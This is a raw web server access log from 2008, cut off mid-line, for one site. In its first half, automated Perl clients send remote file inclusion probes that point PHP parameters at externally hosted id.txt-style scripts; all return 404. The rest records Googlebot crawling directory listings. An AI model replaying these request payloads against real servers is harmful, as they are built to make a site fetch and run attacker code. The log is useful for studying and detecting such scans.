89.108.67.220 - - [01/Aug/2008:05:01:58 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atventure.de/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
89.108.67.220 - - [01/Aug/2008:05:01:59 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atventure.de/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
89.108.67.220 - - [01/Aug/2008:05:01:59 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atventure.de/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
89.186.1.54 - - [01/Aug/2008:05:02:10 -0700] "GET /errors.php?error=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.symis.net"
89.186.1.54 - - [01/Aug/2008:05:02:10 -0700] "GET /logs/errors.php?error=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.symis.net"
89.186.1.54 - - [01/Aug/2008:05:02:10 -0700] "GET /logs/access_080701.log/errors.php?error=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:05:18:47 -0700] "GET /logs//errors.php?error=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:05:18:48 -0700] "GET //errors.php?error=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:05:18:52 -0700] "GET /logs/access_080701.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:05:18:52 -0700] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:05:18:53 -0700] "GET /logs/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:05:20:51 -0700] "GET /logs/access_080701.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:05:20:52 -0700] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:05:20:52 -0700] "GET /logs/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:02 -0700] "GET / HTTP/1.1" 200 647 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:02 -0700] "GET /?N=D HTTP/1.1" 200 647 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:02 -0700] "GET /?M=A HTTP/1.1" 200 647 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:02 -0700] "GET /?S=A HTTP/1.1" 200 647 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:02 -0700] "GET /?D=A HTTP/1.1" 200 647 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:02 -0700] "GET /logs/ HTTP/1.1" 200 2368 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:02 -0700] "GET /?N=A HTTP/1.1" 200 647 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:02 -0700] "GET /?M=D HTTP/1.1" 200 647 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:02 -0700] "GET /?S=D HTTP/1.1" 200 647 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:03 -0700] "GET /?D=D HTTP/1.1" 200 647 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:03 -0700] "GET /logs/?N=D HTTP/1.1" 200 2368 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:03 -0700] "GET /logs/?M=A HTTP/1.1" 200 2368 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:03 -0700] "GET /logs/?S=A HTTP/1.1" 200 2368 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:03 -0700] "GET /logs/?D=A HTTP/1.1" 200 2368 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:03 -0700] "GET /logs/?N=A HTTP/1.1" 200 2368 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "symis.net"
74.86.176.75 - - [01/Aug/2008:05:26:03 -0700] "GET /logs/?M=D HTTP/1.1" 200 2368 "-" "Mozi